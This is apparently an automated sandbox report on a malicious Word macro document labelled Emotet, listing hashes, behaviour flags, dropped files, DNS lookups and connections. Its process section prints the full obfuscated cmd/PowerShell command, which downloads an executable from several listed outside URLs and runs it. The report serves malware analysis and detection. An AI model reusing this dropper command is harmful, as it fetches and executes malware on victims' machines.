File name: EMOTET.doc
Full analysis: https://app.any.run/tasks/12299ab1-a5d0-4f57-a80d-45ec4e6f94da
Verdict: Malicious activity
Analysis date: January 17, 2020, 14:50:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: ViHzifOp, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 14 06:34:00 2017, Last Saved Time/Date: Thu Dec 14 06:34:00 2017, Number of Pages: 1, Number of Words: 1, Number of Characters: 11, Security: 0
MD5: E8D9EB977EC98E7616AC0A358D1A44B3
SHA1: F9B475CFF7F059645C511FFB0D5335DB81FE590A
SHA256: C52F09E474C5D9B316E0B8E5E839282E52268A79B03BEF1CEFAAEE4C2CEC793E
SSDEEP: 3072:a6WCv4rz7hnxKaCvT8SVlcP1nyfGfHm7cXSwQ3T6iveFgBuJWz:4z9EjlVmP1c0JQ3NsJ4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 1096)
    • Executes PowerShell scripts
      • cmd.exe (PID: 3796)
    • Starts CMD.EXE for commands execution
      • WINWORD.EXE (PID: 1096)
    • Changes settings of System certificates
      • powershell.exe (PID: 896)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 896)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 1096)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 1096)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD:
  • .doc | Microsoft Word document (54.2)
  • .doc | Microsoft Word document (old ver.) (32.2)

EXIF (FlashPix)

Title: -
Subject: -
Author: ViHzifOp
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2017:12:14 06:34:00
ModifyDate: 2017:12:14 06:34:00
Pages: 1
Words: 1
Characters: 11
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 11
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs: Title, 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
All screenshots are available in the full report
Total processes: 38
Monitored processes: 3
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start → winword.exe → cmd.exe → powershell.exe (per-process details are in the full report)

Process information

PID: 1096
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EMOTET.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000
PID: 3796
CMD:
cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %TVTEimDaQlaTNit%=hqpCiruvT&&set %TQzjKjbpTs%=o^we^r^s&&set %LlcncNiALWEzjzz%=NLjbwkQEoIotK&&set %ntSiPjinh%=p&&set %wbaYkWAbmnYwSCH%=pNzrqJUjLTWbVXw&&set %TTjVYaz%=^he^l^l&&set %UYkqNvdbzcwSaYK%=fdiIPbKwDBiuPEN&&!%ntSiPjinh%!!%TQzjKjbpTs%!!%TTjVYaz%! "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . 
( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')
Path: C:\Windows\system32\cmd.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID: 896
CMD:
powershell "((' (Lsf((LPhfLPh+LPhuGfranc = LPh+LPLsf+LsfhnL'+'Ph+LPhew-obLsf+LsfjeLPh+Lsf+LsfLPhct System.NetLPh+LPh.WLPh+LPhebClLPh+LPhienLP'+'h+'+'LPht'+';fuGns'+'L'+'sf+LsfLPh+LPhadasd = nLPh'+'+Lsf+Ls'+'fLPhe'+'LPh+LPhw-object rando'+'m;fuGbLPh+LPhcd = JLPhLsf+Ls'+'f+LPhfLs'+'f+L'+'sfChttLsf+Lsfp:/LPh+Lsf+LsfLPh'+'/wwLPh+LPhw.LPh+LPhzaLPh+LPhvierLsf+LsfdesLPh+LPhign.cLPh+LPh'+'om/0mRP/,Lsf+LsfhttpLPh+LPh://wLLsf+LsfPh+LPhww.mivasoLPh+LPh.cl/sLPh'+'+LPhlhdLPh+LPh1dvLPh+LP'+'h/,LPh+LPhhtLPh+Lsf+LsfLPhtLPh+LPhp:LPh+LPh//www.autLsf+LsfomobiLsf+LsfleLP'+'h+LPh-bLPh+LPhebLP'+'h+LPhra.de/xLPh+LPhiLPh+LPhIItW/,hLPh+LPhttp'+'LPh+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhublLPh+LPhic/LPh+LPhPRLm709/JLPh+LPhfC.SLsf+Lsfplit(JLPh+LPhfCLPh+LPh,LP'+'h+LPhJf'+'Lsf+LsfC)LPh+LPh;fuGkLPh+LPharLPh+LPhapas = fuLPh+'+'LPhGnsadasd.LPhLsf+L'+'sf+LP'+'hnextLPh+LLsf'+'+LsfPh(1, '+'Lsf+Lsf343245);fuGhuLPh+LPhas LPh+LPh= fuGenLPh+LPhv:Lsf+Ls'+'fpLPh+LPhublicLPh+LPh LPh+LPh+ JfCk79JfC Lsf+Lsf+Lsf+Lsf fuG'+'karapLPLsf+Lsfh+LPhas + LPh+LPhJfCLPh+LPh.exLPh+LPheJfC;foreac'+'h(fuGaLP'+'h+LPhbc in '+'fLPh+LPhuGbcdLPh+LPh){try{fuGf'+'LPh+LPhLsf+Lsfranc.DownloadFilLPh+LPhe(fuLPh+LPLsf+LsfhGLPh+LPhaLsf+Lsfbc.ToString(),Lsf+Lsf fuLsf+LsfGhLPh+LPhuaLPh+LPhs);LPh+LPhInvoke-'+'Item'+'LPLsf+'+'Lsfh+LPh(fuGhuaL'+'Ph+LPhLsf+Lsfs)LPh+LPh;brLsf+LsfeLPh+LPhak;}catch{wrLPh+LPhite-host fLsf+Lsfu'+'GLPh'+'+LPh_.Exception.MessaLPh+LPhgeLPh+LPh;}}LPh) -rEPLACe([CHAr]74+[CHAr]102+[CHAr]67),[C'+'HAr]39-rEPLACe LPhfuLsf+LsfGLPh,[CHAr]36 '+'-rEPLACe LPhk79LPh,[CHAr]92) O6g'+' . 
( gOhELsf+LsfNv:PLsf+LsfUBLIC[1Lsf+Lsf3]+gOheNv:publiC[5]+LPhXLPh)Lsf).rEplACE(([CHAr]79+[CHA'+'r]54+[CHAr]103),Lsfo8zLsf).rEplACE((['+'CHAr]1'+'03+[CHAr]79+[CHAr]104),[STriNG][CHAr]36).rEplACE(Ls'+'fLPhLsf,['+'STriNG][CHAr]39) o8z& ( mJqeNV:PUBLic[13]+'+'mJqENv:pubLIc[5]+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 819
Read events: 1 060
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 3
Text files: 0
Unknown types: 3

Dropped files

  • PID 1096, WINWORD.EXE
    Filename: C:\Users\admin\AppData\Local\Temp\CVRB214.tmp.cvr
    Type: -
    MD5: -
    SHA256: -
  • PID 896, powershell.exe
    Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TCSKOEAMQOJHM56FP1F3.temp
    Type: -
    MD5: -
    SHA256: -
  • PID 896, powershell.exe
    Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A2ECA083537A02B6158458FF1752C63F
    Type: binary
    MD5: B92B932DB9511C477EA3B7FD00731C00
    SHA256: 6CDA4C84B5EB93A9C4A603DDEF0415E5B76CAB78F6756D286F796D98370B10FF
  • PID 896, powershell.exe
    Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Type: binary
    MD5: 35375F3D71AE42AA9777154D256B33BF
    SHA256: BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
  • PID 896, powershell.exe
    Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39bf72.TMP
    Type: binary
    MD5: 35375F3D71AE42AA9777154D256B33BF
    SHA256: BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
  • PID 1096, WINWORD.EXE
    Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Type: pgc
    MD5: 71834CB5A40FD067717E5E242FCFDDE2
    SHA256: 053F9EECE736E49AA9E3C99DB635C70D83D2B9311D2D3CA8D612695DCF73376C
  • PID 1096, WINWORD.EXE
    Filename: C:\Users\admin\AppData\Local\Temp\~$EMOTET.doc
    Type: pgc
    MD5: 77062AD3919613D252BBDA640BCF8E67
    SHA256: 527B246D794ACF52454FC292293578EA8675DE33257846A9D35EDDFA9294DEF7
  • PID 896, powershell.exe
    Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A2ECA083537A02B6158458FF1752C63F
    Type: der
    MD5: B15409274F54AD8F023D3B85A5ECEC5D
    SHA256: 25847D668EB4F04FDD40B12B6B0740C567DA7D024308EB6C2C96FE41D9DE218D
Download the PCAP, analyze network streams, HTTP content and a lot more in the full report.
HTTP(S) requests: 0
TCP/UDP connections: 4
DNS requests: 4
Threats: 0

HTTP requests

No HTTP requests

Connections

  • PID 896, powershell.exe | IP: 34.208.67.28:443 | Domain: www.mivaso.cl | ASN: Amazon.com, Inc. | CN: US | Reputation: suspicious
  • PID 896, powershell.exe | IP: 2.19.43.67:80 | Domain: cert.int-x3.letsencrypt.org | ASN: Akamai International B.V. | CN: - | Reputation: unknown
  • PID 896, powershell.exe | IP: 34.208.67.28:80 | Domain: www.mivaso.cl | ASN: Amazon.com, Inc. | CN: US | Reputation: suspicious

DNS requests

  • www.zavierdesign.com | IP: - | Reputation: malicious
  • www.mivaso.cl | IP: 34.208.67.28 | Reputation: whitelisted
  • cert.int-x3.letsencrypt.org | IP: 2.19.43.67 | Reputation: whitelisted
  • mivaso.cl | IP: 34.208.67.28 | Reputation: malicious

Threats

No threats detected
No debug info